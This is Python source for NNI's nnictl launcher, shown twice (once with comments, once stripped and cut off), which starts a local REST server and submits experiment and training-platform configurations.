if experiment_config.get('multiThread'):
request_data['multiThread'] = experiment_config.get('multiThread')
if experiment_config.get('nniManagerIp'):
request_data['nniManagerIp'] = experiment_config.get('nniManagerIp')
if experiment_config.get('advisor'):
request_data['advisor'] = experiment_config['advisor']
if request_data['advisor'].get('gpuNum'):
print_error('gpuNum is deprecated, please use gpuIndices instead.')
if request_data['advisor'].get('gpuIndices') and isinstance(request_data['advisor'].get('gpuIndices'), int):
request_data['advisor']['gpuIndices'] = str(request_data['advisor'].get('gpuIndices'))
else:
request_data['tuner'] = experiment_config['tuner']
if request_data['tuner'].get('gpuNum'):
print_error('gpuNum is deprecated, please use gpuIndices instead.')
if request_data['tuner'].get('gpuIndices') and isinstance(request_data['tuner'].get('gpuIndices'), int):
request_data['tuner']['gpuIndices'] = str(request_data['tuner'].get('gpuIndices'))
if 'assessor' in experiment_config:
request_data['assessor'] = experiment_config['assessor']
if request_data['assessor'].get('gpuNum'):
print_error('gpuNum is deprecated, please remove it from your config file.')
#debug mode should disable version check
if experiment_config.get('debug') is not None:
request_data['versionCheck'] = not experiment_config.get('debug')
#validate version check
if experiment_config.get('versionCheck') is not None:
request_data['versionCheck'] = experiment_config.get('versionCheck')
if experiment_config.get('logCollection'):
request_data['logCollection'] = experiment_config.get('logCollection')
request_data['clusterMetaData'] = []
if experiment_config['trainingServicePlatform'] == 'kubeflow':
request_data['clusterMetaData'].append(
{'key': 'kubeflow_config', 'value': experiment_config['kubeflowConfig']})
request_data['clusterMetaData'].append(
{'key': 'trial_config', 'value': experiment_config['trial']})
elif experiment_config['trainingServicePlatform'] == 'frameworkcontroller':
request_data['clusterMetaData'].append(
{'key': 'frameworkcontroller_config', 'value': experiment_config['frameworkcontrollerConfig']})
request_data['clusterMetaData'].append(
{'key': 'trial_config', 'value': experiment_config['trial']})
elif experiment_config['trainingServicePlatform'] == 'adl':
request_data['clusterMetaData'].append(
{'key': 'trial_config', 'value': experiment_config['trial']})
response = rest_post(experiment_url(port), json.dumps(request_data), REST_TIME_OUT, show_error=True)
if check_response(response):
return response
else:
_, stderr_full_path = get_log_path(config_file_name)
if response is not None:
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
print_error('Setting experiment error, error message is {}'.format(response.text))
return None
def set_experiment_v2(experiment_config, mode, port, config_file_name):
'''Call startExperiment (rest POST /experiment) with yaml file content'''
response = rest_post(experiment_url(port), json.dumps(experiment_config), REST_TIME_OUT, show_error=True)
if check_response(response):
return response
else:
_, stderr_full_path = get_log_path(config_file_name)
if response is not None:
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
print_error('Setting experiment error, error message is {}'.format(response.text))
return None
def set_platform_config(platform, experiment_config, port, config_file_name, rest_process):
'''call set_cluster_metadata for specific platform'''
print_normal('Setting {0} config...'.format(platform))
config_result, err_msg = None, None
if platform == 'adl':
config_result, err_msg = set_adl_config(experiment_config, port, config_file_name)
elif platform == 'kubeflow':
config_result, err_msg = set_kubeflow_config(experiment_config, port, config_file_name)
elif platform == 'frameworkcontroller':
config_result, err_msg = set_frameworkcontroller_config(experiment_config, port, config_file_name)
else:
raise Exception(ERROR_INFO % 'Unsupported platform!')
exit(1)
if config_result:
config_result, err_msg = set_shared_storage(experiment_config, port, config_file_name)
if config_result:
print_normal('Successfully set {0} config!'.format(platform))
else:
print_error('Failed! Error is: {}'.format(err_msg))
try:
kill_command(rest_process.pid)
except Exception:
raise Exception(ERROR_INFO % 'Rest server stopped!')
exit(1)
def launch_experiment(args, experiment_config, mode, experiment_id, config_version):
'''follow steps to start rest server and start experiment'''
# check packages for tuner
package_name, module_name = None, None
if experiment_config.get('tuner') and experiment_config['tuner'].get('builtinTunerName'):
package_name = experiment_config['tuner']['builtinTunerName']
module_name, _ = get_builtin_module_class_name('tuners', package_name)
elif experiment_config.get('advisor') and experiment_config['advisor'].get('builtinAdvisorName'):
package_name = experiment_config['advisor']['builtinAdvisorName']
module_name, _ = get_builtin_module_class_name('advisors', package_name)
if package_name and module_name:
try:
stdout_full_path, stderr_full_path = get_log_path(experiment_id)
with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
check_call([sys.executable, '-c', 'import %s'%(module_name)], stdout=stdout_file, stderr=stderr_file)
except CalledProcessError:
print_error('some errors happen when import package %s.' %(package_name))
print_log_content(experiment_id)
if package_name in ['SMAC', 'BOHB', 'PPOTuner']:
print_error(f'The dependencies for {package_name} can be installed through pip install nni[{package_name}]')
raise
if config_version == 1:
log_dir = experiment_config['logDir'] if experiment_config.get('logDir') else NNI_HOME_DIR
else:
log_dir = experiment_config['experimentWorkingDirectory'] if experiment_config.get('experimentWorkingDirectory') else NNI_HOME_DIR
log_level = experiment_config['logLevel'] if experiment_config.get('logLevel') else 'info'
#view experiment mode do not need debug function, when view an experiment, there will be no new logs created
foreground = False
if mode != 'view':
foreground = args.foreground
if log_level not in ['trace', 'debug'] and (args.debug or experiment_config.get('debug') is True):
log_level = 'debug'
# start rest server
if config_version == 1:
platform = experiment_config['trainingServicePlatform']
elif isinstance(experiment_config['trainingService'], list):
platform = 'hybrid'
else:
platform = experiment_config['trainingService']['platform']
rest_process, start_time = start_rest_server(args.port, platform, \
mode, experiment_id, foreground, log_dir, log_level, args.url_prefix)
# save experiment information
Experiments().add_experiment(experiment_id, args.port, start_time,
platform,
experiment_config.get('experimentName', 'N/A')
, pid=rest_process.pid, logDir=log_dir, prefixUrl=args.url_prefix)
# Deal with annotation
if experiment_config.get('useAnnotation'):
path = os.path.join(tempfile.gettempdir(), get_user(), 'nni', 'annotation')
if not os.path.isdir(path):
os.makedirs(path)
path = tempfile.mkdtemp(dir=path)
if config_version == 1:
nas_mode = experiment_config['trial'].get('nasMode', 'classic_mode')
code_dir = expand_annotations(experiment_config['trial']['codeDir'], path, nas_mode=nas_mode)
experiment_config['trial']['codeDir'] = code_dir
else:
code_dir = expand_annotations(experiment_config['trialCodeDirectory'], path)
experiment_config['trialCodeDirectory'] = code_dir
search_space = generate_search_space(code_dir)
experiment_config['searchSpace'] = search_space
assert search_space, ERROR_INFO % 'Generated search space is empty'
elif config_version == 1:
if experiment_config.get('searchSpacePath'):
search_space = get_json_content(experiment_config.get('searchSpacePath'))
experiment_config['searchSpace'] = search_space
else:
experiment_config['searchSpace'] = ''
# check rest server
running, _ = check_rest_server(args.port)
if running:
print_normal('Successfully started Restful server!')
else:
print_error('Restful server start failed!')
print_log_content(experiment_id)
try:
kill_command(rest_process.pid)
except Exception:
raise Exception(ERROR_INFO % 'Rest server stopped!')
exit(1)
if config_version == 1 and mode != 'view':
# set platform configuration
set_platform_config(experiment_config['trainingServicePlatform'], experiment_config, args.port,\
experiment_id, rest_process)
# start a new experiment
print_normal('Starting experiment...')
# set debug configuration
if mode != 'view' and experiment_config.get('debug') is None:
experiment_config['debug'] = args.debug
if config_version == 1:
response = set_experiment_v1(experiment_config, mode, args.port, experiment_id)
else:
response = set_experiment_v2(experiment_config, mode, args.port, experiment_id)
if response:
if experiment_id is None:
experiment_id = json.loads(response.text).get('experiment_id')
else:
print_error('Start experiment failed!')
print_log_content(experiment_id)
try:
kill_command(rest_process.pid)
except Exception:
raise Exception(ERROR_INFO % 'Restful server stopped!')
exit(1)
url_prefix_format = '' if args.url_prefix is None else '/{0}'.format(args.url_prefix)
if experiment_config.get('nniManagerIp'):
web_ui_url_list = ['http://{0}:{1}{2}'.format(experiment_config['nniManagerIp'], str(args.port), url_prefix_format)]
else:
web_ui_url_list = get_local_urls(args.port, url_prefix_format)
Experiments().update_experiment(experiment_id, 'webuiUrl', web_ui_url_list)
print_normal(EXPERIMENT_SUCCESS_INFO % (experiment_id, ' '.join(web_ui_url_list)))
if mode != 'view' and args.foreground:
try:
while True:
log_content = rest_process.stdout.readline().strip().decode('utf-8')
print(log_content)
except KeyboardInterrupt:
kill_command(rest_process.pid)
print_normal('Stopping experiment...')
def _validate_v1(config, path):
try:
validate_all_content(config, path)
except Exception as e:
print_error(f'Config V1 validation failed: {repr(e)}')
exit(1)
def _validate_v2(config, path):
base_path = Path(path).parent
try:
conf = ExperimentConfig(_base_path=base_path, **config)
return conf.json()
except Exception as e:
print_error(f'Config V2 validation failed: {repr(e)}')
def _validate_prefix_path(path):
assert not path.startswith('/'), 'URL prefix should not start with "/".'
parts = path.split('/')
valid = all(re.match('^[A-Za-z0-9_-]*$', part) for part in parts)
assert valid, 'URL prefix should only contain letter, number, underscore, and hyphen.'
def create_experiment(args):
'''start a new experiment'''
experiment_id = ''.join(random.sample(string.ascii_letters + string.digits, 8))
config_path = os.path.abspath(args.config)
if not os.path.exists(config_path):
print_error('Please set correct config path!')
exit(1)
config_yml = get_yml_content(config_path)
if 'trainingServicePlatform' in config_yml:
_validate_v1(config_yml, config_path)
platform = config_yml['trainingServicePlatform']
if platform in k8s_training_services:
schema = 1
config_v1 = config_yml
else:
schema = 2
config_v2 = convert.to_v2(config_yml).json()
else:
config_v2 = _validate_v2(config_yml, config_path)
schema = 2
try:
if schema == 1:
launch_experiment(args, config_v1, 'create', experiment_id, 1)
else:
launch_experiment(args, config_v2, 'create', experiment_id, 2)
except Exception as exception:
restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
if restServerPid:
kill_command(restServerPid)
print_error(exception)
exit(1)
def manage_stopped_experiment(args, mode):
'''view a stopped experiment'''
update_experiment()
experiments_config = Experiments()
experiments_dict = experiments_config.get_all_experiments()
experiment_id = None
#find the latest stopped experiment
if not args.id:
print_error('Please set experiment id! \nYou could use \'nnictl {0} id\' to {0} a stopped experiment!\n' \
'You could use \'nnictl experiment list --all\' to show all experiments!\n' \
'If your experiment is not started in current machine, you could specify experiment folder using ' \
'--experiment_dir argument'.format(mode))
exit(1)
else:
if experiments_dict.get(args.id) is None:
print_error('Id %s not exist!' % args.id)
exit(1)
if experiments_dict[args.id]['status'] != 'STOPPED':
print_error('Only stopped experiments can be {0}ed!'.format(mode))
exit(1)
experiment_id = args.id
print_normal('{0} experiment {1}...'.format(mode, experiment_id))
experiment_config = Config(experiment_id, experiments_dict[args.id]['logDir']).get_config()
experiments_config.update_experiment(args.id, 'port', args.port)
args.url_prefix = experiments_dict[args.id]['prefixUrl']
assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
try:
if 'trainingServicePlatform' in experiment_config:
experiment_config['logDir'] = experiments_dict[args.id]['logDir']
launch_experiment(args, experiment_config, mode, experiment_id, 1)
else:
experiment_config['experimentWorkingDirectory'] = experiments_dict[args.id]['logDir']
launch_experiment(args, experiment_config, mode, experiment_id, 2)
except Exception as exception:
restServerPid = Experiments().get_all_experiments().get(experiment_id, {}).get('pid')
if restServerPid:
kill_command(restServerPid)
print_error(exception)
exit(1)
def view_experiment(args):
'''view a stopped experiment'''
if args.experiment_dir:
manage_external_experiment(args, 'view')
else:
manage_stopped_experiment(args, 'view')
def resume_experiment(args):
'''resume an experiment'''
'''view a stopped experiment'''
if args.experiment_dir:
manage_external_experiment(args, 'resume')
else:
manage_stopped_experiment(args, 'resume')
def manage_external_experiment(args, mode):
'''view a experiment from external path'''
# validate arguments
if not os.path.exists(args.experiment_dir):
print_error('Folder %s does not exist!' % args.experiment_dir)
exit(1)
if not os.path.isdir(args.experiment_dir):
print_error('Path %s is not folder directory!' % args.experiment_dir)
exit(1)
if args.id:
experiment_id = args.id
log_dir = args.experiment_dir
else:
print_normal('NNI can not detect experiment id in argument, will use last folder name as experiment id in experiment_dir argument.')
experiment_id = Path(args.experiment_dir).name
log_dir = str(Path(args.experiment_dir).parent)
if not experiment_id:
print_error("Please set experiment id argument, or add id as the last folder name in experiment_dir argument.")
exit(1)
args.url_prefix = None
experiment_config = Config(experiment_id, log_dir).get_config()
assert 'trainingService' in experiment_config or 'trainingServicePlatform' in experiment_config
try:
if 'trainingServicePlatform' in experiment_config:
experiment_config['logDir'] = log_dir
launch_experiment(args, experiment_config, mode, experiment_id, 1)
else:
experiment_config['experimentWorkingDirectory'] = log_dir
launch_experiment(args, experiment_config, mode, experiment_id, 2)
except Exception as exception:
print_error(exception)
exit(1)
| 49.647727 | 140 | 0.688552 |
import json
import os
from pathlib import Path
import sys
import string
import random
import time
import tempfile
import re
from subprocess import Popen, check_call, CalledProcessError, PIPE, STDOUT
from nni.experiment.config import ExperimentConfig, convert
from nni.tools.annotation import expand_annotations, generate_search_space
from nni.tools.package_utils.tuner_factory import get_builtin_module_class_name
from .launcher_utils import validate_all_content
from .rest_utils import rest_put, rest_post, check_rest_server, check_response
from .url_utils import cluster_metadata_url, experiment_url, get_local_urls, set_prefix_url
from .config_utils import Config, Experiments
from .common_utils import get_yml_content, get_json_content, print_error, print_normal, detect_port, get_user
from .constants import NNI_HOME_DIR, ERROR_INFO, REST_TIME_OUT, EXPERIMENT_SUCCESS_INFO, LOG_HEADER
from .command_utils import check_output_command, kill_command
from .nnictl_utils import update_experiment
k8s_training_services = ['kubeflow', 'frameworkcontroller', 'adl']
def get_log_path(experiment_id):
os.makedirs(os.path.join(NNI_HOME_DIR, experiment_id, 'log'), exist_ok=True)
stdout_full_path = os.path.join(NNI_HOME_DIR, experiment_id, 'log', 'nnictl_stdout.log')
stderr_full_path = os.path.join(NNI_HOME_DIR, experiment_id, 'log', 'nnictl_stderr.log')
return stdout_full_path, stderr_full_path
def print_log_content(config_file_name):
stdout_full_path, stderr_full_path = get_log_path(config_file_name)
print_normal(' Stdout:')
print(check_output_command(stdout_full_path))
print('\n\n')
print_normal(' Stderr:')
print(check_output_command(stderr_full_path))
def start_rest_server(port, platform, mode, experiment_id, foreground=False, log_dir=None, log_level=None, url_prefix=None):
if detect_port(port):
print_error('Port %s is used by another process, please reset the port!\n' \
'You could use \'nnictl create --help\' to get help information' % port)
exit(1)
if (platform not in ['local', 'aml']) and detect_port(int(port) + 1):
print_error('%s mode need an additional adjacent port %d, and the port %d is used by another process!\n' \
'You could set another port to start experiment!\n' \
'You could use \'nnictl create --help\' to get help information' % (platform, (int(port) + 1), (int(port) + 1)))
exit(1)
print_normal('Starting restful server...')
import nni_node
entry_dir = nni_node.__path__[0]
if (not entry_dir) or (not os.path.exists(entry_dir)):
print_error('Fail to find nni under python library')
exit(1)
entry_file = os.path.join(entry_dir, 'main.js')
if sys.platform == 'win32':
node_command = os.path.join(entry_dir, 'node.exe')
else:
node_command = os.path.join(entry_dir, 'node')
cmds = [node_command, '--max-old-space-size=4096', entry_file, '--port', str(port), '--mode', platform, \
'--experiment_id', experiment_id]
cmds += ['--action', mode]
if log_dir is not None:
cmds += ['--experiments-directory', log_dir]
if log_level is not None:
cmds += ['--log-level', log_level]
if foreground:
cmds += ['--foreground', 'true']
if url_prefix:
_validate_prefix_path(url_prefix)
set_prefix_url(url_prefix)
cmds += ['--url-prefix', url_prefix.strip('/')]
stdout_full_path, stderr_full_path = get_log_path(experiment_id)
with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
start_time = time.time()
time_now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start_time))
log_header = LOG_HEADER % str(time_now)
stdout_file.write(log_header)
stderr_file.write(log_header)
if sys.platform == 'win32':
from subprocess import CREATE_NEW_PROCESS_GROUP
if foreground:
process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=STDOUT, creationflags=CREATE_NEW_PROCESS_GROUP)
else:
process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file, creationflags=CREATE_NEW_PROCESS_GROUP)
else:
if foreground:
process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=PIPE)
else:
process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file)
return process, int(start_time * 1000)
def set_trial_config(experiment_config, port, config_file_name):
request_data = dict()
request_data['trial_config'] = experiment_config['trial']
response = rest_put(cluster_metadata_url(port), json.dumps(request_data), REST_TIME_OUT)
if check_response(response):
return True
else:
print('Error message is {}'.format(response.text))
_, stderr_full_path = get_log_path(config_file_name)
if response:
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
return False
def set_adl_config(experiment_config, port, config_file_name):
adl_config_data = dict()
adl_config_data['adl_config'] = {}
response = rest_put(cluster_metadata_url(port), json.dumps(adl_config_data), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
set_V1_common_config(experiment_config, port, config_file_name)
result, message = setNNIManagerIp(experiment_config, port, config_file_name)
if not result:
return result, message
return set_trial_config(experiment_config, port, config_file_name), None
def validate_response(response, config_file_name):
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
print_error('Error:' + err_message)
exit(1)
def set_V1_common_config(experiment_config, port, config_file_name):
version_check = True
if experiment_config.get('debug') is not None:
version_check = not experiment_config.get('debug')
if experiment_config.get('versionCheck') is not None:
version_check = experiment_config.get('versionCheck')
response = rest_put(cluster_metadata_url(port), json.dumps({'version_check': version_check}), REST_TIME_OUT)
validate_response(response, config_file_name)
if experiment_config.get('logCollection'):
data = json.dumps({'log_collection': experiment_config.get('logCollection')})
response = rest_put(cluster_metadata_url(port), data, REST_TIME_OUT)
validate_response(response, config_file_name)
def setNNIManagerIp(experiment_config, port, config_file_name):
if experiment_config.get('nniManagerIp') is None:
return True, None
ip_config_dict = dict()
ip_config_dict['nni_manager_ip'] = {'nniManagerIp': experiment_config['nniManagerIp']}
response = rest_put(cluster_metadata_url(port), json.dumps(ip_config_dict), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
return True, None
def set_kubeflow_config(experiment_config, port, config_file_name):
kubeflow_config_data = dict()
kubeflow_config_data['kubeflow_config'] = experiment_config['kubeflowConfig']
response = rest_put(cluster_metadata_url(port), json.dumps(kubeflow_config_data), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
set_V1_common_config(experiment_config, port, config_file_name)
result, message = setNNIManagerIp(experiment_config, port, config_file_name)
if not result:
return result, message
return set_trial_config(experiment_config, port, config_file_name), err_message
def set_frameworkcontroller_config(experiment_config, port, config_file_name):
frameworkcontroller_config_data = dict()
frameworkcontroller_config_data['frameworkcontroller_config'] = experiment_config['frameworkcontrollerConfig']
response = rest_put(cluster_metadata_url(port), json.dumps(frameworkcontroller_config_data), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
set_V1_common_config(experiment_config, port, config_file_name)
result, message = setNNIManagerIp(experiment_config, port, config_file_name)
if not result:
return result, message
return set_trial_config(experiment_config, port, config_file_name), err_message
def set_shared_storage(experiment_config, port, config_file_name):
if 'sharedStorage' in experiment_config:
data = json.dumps({'shared_storage_config': experiment_config['sharedStorage']})
response = rest_put(cluster_metadata_url(port), data, REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
return True, None
def set_experiment_v1(experiment_config, mode, port, config_file_name):
request_data = dict()
request_data['authorName'] = experiment_config['authorName']
request_data['experimentName'] = experiment_config['experimentName']
request_data['trialConcurrency'] = experiment_config['trialConcurrency']
request_data['maxExecDuration'] = experiment_config['maxExecDuration']
request_data['maxExperimentDuration'] = str(experiment_config['maxExecDuration']) + 's'
request_data['maxTrialNum'] = experiment_config['maxTrialNum']
request_data['maxTrialDuration'] = experiment_config['maxTrialDuration']
request_data['maxTrialNumber'] = experiment_config['maxTrialNum']
request_data['searchSpace'] = experiment_config.get('searchSpace')
request_data['trainingServicePlatform'] = experiment_config.get('trainingServicePlatform')
request_data['trainingService'] = {'platform': experiment_config.get('trainingServicePlatform')}
if experiment_config.get('description'):
request_data['description'] = experiment_config['description']
if experiment_config.get('multiPhase'):
request_data['multiPhase'] = experiment_config.get('multiPhase')
if experiment_config.get('multiThread'):
request_data['multiThread'] = experiment_config.get('multiThread')
if experiment_config.get('nniManagerIp'):
request_data['nniManagerIp'] = experiment_config.get('nniManagerIp')
if experiment_config.get('advisor'):
request_data['advisor'] = experiment_config['advisor']
if request_data['advisor'].get('gpuNum'):
print_error('gpuNum is deprecated, please use gpuIndices instead.')
if request_data['advisor'].get('gpuIndices') and isinstance(request_data['advisor'].get('gpuIndices'), int):
request_data['advisor']['gpuIndices'] = str(request_data['advisor'].get('gpuIndices'))
else:
request_data['tuner'] = experiment_config['tuner']
if request_data['tuner'].get('gpuNum'):
print_error('gpuNum is deprecated, please use gpuIndices instead.')
if request_data['tuner'].get('gpuIndices') and isinstance(request_data['tuner'].get('gpuIndices'), int):
request_data['tuner']['gpuIndices'] = str(request_data['tuner'].get('gpuIndices'))
if 'assessor' in experiment_config:
request_data['assessor'] = experiment_config['assessor']
if request_data['assessor'].get('gpuNum'):
print_error('gpuNum is deprecated, please remove it from your config file.')
if experiment_config.get('debug') is not None:
request_data['versionCheck'] = not experiment_config.get('debug')
if experiment_config.get('versionCheck') is not None:
request_data['versionCheck'] = experiment_config.get('versionCheck')
if experiment_config.get('logCollection'):
request_data['logCollection'] = experiment_config.get('logCollection')
request_data['clusterMetaData'] = []
if experiment_config['trainingServicePlatform'] == 'kubeflow':
request_data['clusterMetaData'].append(
{'key': 'kubeflow_config', 'value': experiment_config['kubeflowConfig']})
request_data['clusterMetaData'].append(
{'key': 'trial_config', 'value': experiment_config['trial']})
elif experiment_config['trainingServicePlatform'] == 'frameworkcontroller':
request_data['clusterMetaData'].append(
{'key': 'frameworkcontroller_config', 'value': experiment_config['frameworkcontrollerConfig']})
request_data['clusterMetaData'].append(
{'key': 'trial_config', 'value': experiment_config['trial']})
elif experiment_config['trainingServicePlatform'] == 'adl':
request_data['clusterMetaData'].append(
{'key': 'trial_config', 'value': experiment_config['trial']})
response = rest_post(experiment_url(port), json.dumps(request_data), REST_TIME_OUT, show_error=True)
if check_response(response):
return response
else:
_, stderr_full_path = get_log_path(config_file_name)
if response is not None:
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
print_error('Setting experiment error, error message is {}'.format(response.text))
return None
def set_experiment_v2(experiment_config, mode, port, config_file_name):
response = rest_post(experiment_url(port), json.dumps(experiment_config), REST_TIME_OUT, show_error=True)
if check_response(response):
return response
else:
_, stderr_full_path = get_log_path(config_file_name)
if response is not None:
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
print_error('Setting experiment error, error message is {}'.format(response.text))
return None
def set_platform_config(platform, experiment_config, port, config_file_name, rest_process):
print_normal('Setting {0} config...'.format(platform))
config_result, err_msg = None, None
if platform == 'adl':
config_result, err_msg = set_adl_config(experiment_config, port, config_file_name)
elif platform == 'kubeflow':
config_result, err_msg = set_kubeflow_config(experiment_config, port, config_file_name)
elif platform == 'frameworkcontroller':
config_result, err_msg = set_frameworkcontroller_config(experiment_config, port, config_file_name)
else:
raise Exception(ERROR_INFO % 'Unsupported platform!')
exit(1)
if config_result:
config_result, err_msg = set_shared_storage(experiment_config, port, config_file_name)
if config_result:
print_normal('Successfully set {0} config!'.format(platform))
else:
print_error('Failed! Error is: {}'.format(err_msg))
try:
kill_command(rest_process.pid)
except Exception:
raise Exception(ERROR_INFO % 'Rest server stopped!')
exit(1)
def launch_experiment(args, experiment_config, mode, experiment_id, config_version):
package_name, module_name = None, None
if experiment_config.get('tuner') and experiment_config['tuner'].get('builtinTunerName'):
package_name = experiment_config['tuner']['builtinTunerName']
module_name, _ = get_builtin_module_class_name('tuners', package_name)
elif experiment_config.get('advisor') and experiment_config['advisor'].get('builtinAdvisorName'):
package_name = experiment_config['advisor']['builtinAdvisorName']
module_name, _ = get_builtin_module_class_name('advisors', package_name)
if package_name and module_name:
try:
stdout_full_path, stderr_full_path = get_log_path(experiment_id)
with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
check_call([sys.executable, '-c', 'import %s'%(module_name)], stdout=stdout_file, stderr=stderr_file)
except CalledProcessError:
print_error('some errors happen when import package %s.' %(package_name))
print_log_content(experiment_id)
if package_name in ['SMAC', 'BOHB', 'PPOTuner']:
print_error(f'The dependencies for {package_name} can be installed through pip install nni[{package_name}]')
raise
if config_version == 1:
log_dir = experiment_config['logDir'] if experiment_config.get('logDir') else NNI_HOME_DIR
else:
log_dir = experiment_config['experimentWorkingDirectory'] if experiment_config.get('experimentWorkingDirectory') else NNI_HOME_DIR
log_level = experiment_config['logLevel'] if experiment_config.get('logLevel') else 'info'
foreground = False
if mode != 'view':
foreground = args.foreground
if log_level not in ['trace', 'debug'] and (args.debug or experiment_config.get('debug') is True):
log_level = 'debug'
if config_version == 1:
platform = experiment_config['trainingServicePlatform']
elif isinstance(experiment_config['trainingService'], list):
platform = 'hybrid'
else:
platform = experiment_config['trainingService']['platform']
rest_process, start_time = start_rest_server(args.port, platform, \
mode, experiment_id, foreground, log_dir, log_level, args.url_prefix)
Experiments().add_experiment(experiment_id, args.port, start_time,
platform,
experiment_config.get('experimentName', 'N/A')
, pid=rest_process.pid, logDir=log_dir, prefixUrl=args.url_prefix)
if experiment_config.get('useAnnotation'):
path = os.path.join(tempfile.gettempdir(), get_user(), 'nni', 'annotation')
if not os.path.isdir(path):
os.makedirs(path)
path = tempfile.mkdtemp(dir=path)
if config_version == 1:
nas_mode = experiment_config['trial'].get('nasMode', 'classic_mode')
code_dir = expand_annotations(experiment_config['trial']['codeDir'], path, nas_mode=nas_mode)
experiment_config['trial']['codeDir'] = code_dir
else:
code_dir = expand_annotations(experiment_config['trialCodeDirectory'], path)
experiment_config['trialCodeDirectory'] = code_dir
search_space = generate_search_space(code_dir)
experiment_config['searchSpace'] = search_space
assert search_space, ERROR_INFO % 'Generated search space is empty'
elif config_version == 1:
if experiment_config.get('searchSpacePath'):
search_space = get_json_content(experiment_config.get('searchSpacePath'))
experiment_config['searchSpace'] = search_space
else:
experiment_config['searchSpace'] = ''
running, _ = check_rest_server(args.port)
if running:
print_normal('Successfully started Restful server!')
else:
print_error('Restful server start failed!')
print_log_content(experiment_id)
try:
kill_command(rest_process.pid)
except Exception:
raise Exception(ERROR_INFO % 'Rest server stopped!')
exit(1)
if config_version == 1 and mode != 'view':
set_platform_config(experiment_config['trainingServicePlatform'], experiment_config, args.port,\
experiment_id, rest_process)
print_normal('Starting experiment...')
if mode != 'view' and experiment_config.get('debug') is None:
experiment_config['debug'] = args.debug
if config_version == 1:
response = set_experiment_v1(experiment_config, mode, args.port, experiment_id)
else:
response = set_experiment_v2(experiment_config, mode, args.port, experiment_id)
if response:
if experiment_id is None:
experiment_id = json.loads(response.text).get('experiment_id')
else:
print_error('Start experiment failed!')
print_log_content(experiment_id)
try:
kill_command(rest_process.pid)
except Exception:
raise Exception(ERROR_INFO % 'Restful server stopped!')
exit(1)
url_prefix_format = '' if args.url_prefix is None else '/{0}'.format(args.url_prefix)
if experiment_config.get('nniManagerIp'):
web_ui_url_list = ['http://{0}:{1}{2}'.format(experiment_config['nniManagerIp'], str(args.port), url_prefix_format)]
else:
web_ui_url_list = get_local_urls(args.port, url_prefix_format)
Experiments().update_experiment(experiment_id, 'webuiUrl', web_ui_url_list)
print_normal(EXPERIMENT_SUCCESS_INFO % (experiment_id, ' '.join(web_ui_url_list)))
if mode != 'view' and args.foreground:
try:
while True:
log_content = rest_process.stdout.readline().strip().decode('utf-8')
print(log_content)
except KeyboardInterrupt:
kill_command(rest_process.pid)
print_normal('Stopping experiment...')
def _validate_v1(config, path):
try:
validate_all_content(config, path)
except Exception as e:
print_error(f'Config V1 validation failed: {repr(e)}')
exit(1)
def _validate_v2(config, path):
base_path = Path(path).parent
try:
conf = ExperimentConfig(_base_path=base_path, **config)
return conf.json()
except Exception as e:
print_error(f'Config V2 validation failed: {repr(e)}')
def _validate_prefix_path(path):
assert not path.startswith('/'), 'URL prefix should not start with "/".'
parts = path.split('/')
valid = all(re.match('^[A-Za-z0-9_-]*$', part) for part in parts)
assert valid, 'URL prefix should only contain letter, number, underscore, and hyphen.'
def create_experiment(args):
experiment_id = ''.join(random.sample(string.ascii_letters + string.digits, 8))
config_path = os.path.abspath(args.config)
if not os.path.exists(config_path):
print_error('Please set correct config path!')
exit(1)
config_yml = get_yml_content(config_path)
if 'trainingServicePlatform' in config_yml:
_validate_v1(config_yml, config_path)
platform = config_yml['trainingServicePlatform']
if platform in k8s_training_services:
schema = 1
config_v1 = config_yml
else:
schema = 2
config_v2 = convert.to_v2(config_yml).json()
else:
